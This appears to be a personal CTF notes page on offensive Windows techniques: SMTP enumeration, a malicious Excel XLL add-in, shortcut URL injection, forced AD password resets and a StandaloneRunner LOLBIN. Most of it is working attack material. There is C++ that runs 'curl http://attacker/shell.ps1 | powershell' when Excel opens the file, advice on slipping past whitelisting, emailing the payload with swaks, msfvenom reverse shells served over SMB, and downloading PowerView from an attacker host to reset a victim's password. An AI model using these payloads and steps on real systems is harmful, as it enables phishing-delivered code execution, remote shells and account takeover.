CTF Notes: 2024-06-23 XLL RCE, Shortcut URL Injection, Windows Enum
smtp enum
A great way to enum for SMTP service is using nmap, which has a builtin script to do so.
> nmap --script smtp-commands.nse --script-args smtp-commands.domain=target -pT:25,465,587 target
PORT STATE SERVICE
25/tcp open smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission
XLL RCE
XLL’s are DLL’s, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents. XLL’s provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL’s can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.
To setup the test environment, follow the steps below
- Install Visual Studio, in here, VS 2022 was used, NOTE: Windows SDK needs to be installed
- Install Windows SDK, https://learn.microsoft.com/en-us/office/client-developer/excel/welcome-to-the-excel-software-development-kit, in here, 2013 was used.
- Get a copy of https://github.com/edparcell/HelloWorldXll
- Open up the solution and set the project to use the latest SDK and project version.
- Switch to a
Release
build - Setup the project property to include the corresponding include and lib folders
2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB
- Update the code in HelloWorldXll.cpp
#include "stdafx.h"
short __stdcall xlAutoOpen()
{
system("curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f -");
return 1;
}
- Build the project and get the .xll file
- Prepare the serve the reverse shell, you can refer to a powershell reverse shell here: https://meowmeowattack.github.io/notes/4-shell/
- Send the .xll file to the target via email, or if they have a SMTP server open
> swaks --to test1@target --from test2@target --header "Subject: test" --body "check" --attach @test.xll --server target --port 25
Shortcut URL Injection
- Shortcut URL injection can be achieved like below
$url = "file:////attacker/share/shell.exe"
$shortcutPath = "C:\path\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
- You can generate a reverse shell using msfvenom and serve it using a simple SMB server
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share ./path
ForceChangePassword
On Windows (expecially in an AD environment), a user may be able to change another user’s password via the user’s (or group’s) permissions. More specially, check for the following permissions:
- GenericAll
- AllExtendedRights
- User-Force-Change-Password
This can be achieved using SharpHound: https://github.com/BloodHoundAD/SharpHound and running BloodHound (https://github.com/BloodHoundAD/BloodHound) locally to analyse the AD forest
> SharpHound.exe -c All --zipfilename output.zip
# on kali, setup bloodhound
> apt install bloodhound neo4j
> python3 -m pip install bloodhound
# run, default pass `neo4j:neo4j`
> neo4j console
> bloodhound --no-sandbox
If any of the abovementioned permissions are found, you can change the target user’s password via PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Invoke-WebRequest -URI http://attacker/PowerView.ps1 -OutFile PowerView.ps1
import-module .\PowerView.ps1
$pass = ConvertTo-SecureString 'password123!@#' -AsPlainText -Force
Set-DomainUserPassword -Identity victim -AccountPassword $pass
Now, you can login via the victim user, if PSRemote permission is enabled for the user
> evil-winrm -i target -u victim -p 'password123!@#'
StandaloneRunner.exe
StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems. It allows developers to execute and debug driver packages in a standalone environment without needing to install them on a target system. The binary can often be found on the following paths
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x86\standalonerunner.exe
- There is an arbitrary code execution vulnerability of the StandaloneRunner.exe
- Read more here: https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md
# copy standalonerunner.exe and standalonexml.dll to a directory
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe" standalonerunner.exe
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.dll" standalonerunner.dll
# Create a file named reboot.rsf in the same directory and fill with some content
echo testdir > reboot.rsf
echo True >> reboot.rsf
# Create the required folder structure
mkdir testdir
mkdir testdir\working
# create a rsf.rsf file in the working directory
echo 1 > testdir\working\rsf.rsf
# Create a command.txt file in the current directory and fill it with the command to execute
echo "c:\temp\shell.exe" > command.txt
Windows folder/file enum by keyword
To locate file/folder permissions with a certain keyword, one can use the following commmad
> ICACLS "C:\*." /T /C 2>$null | findstr "keyword"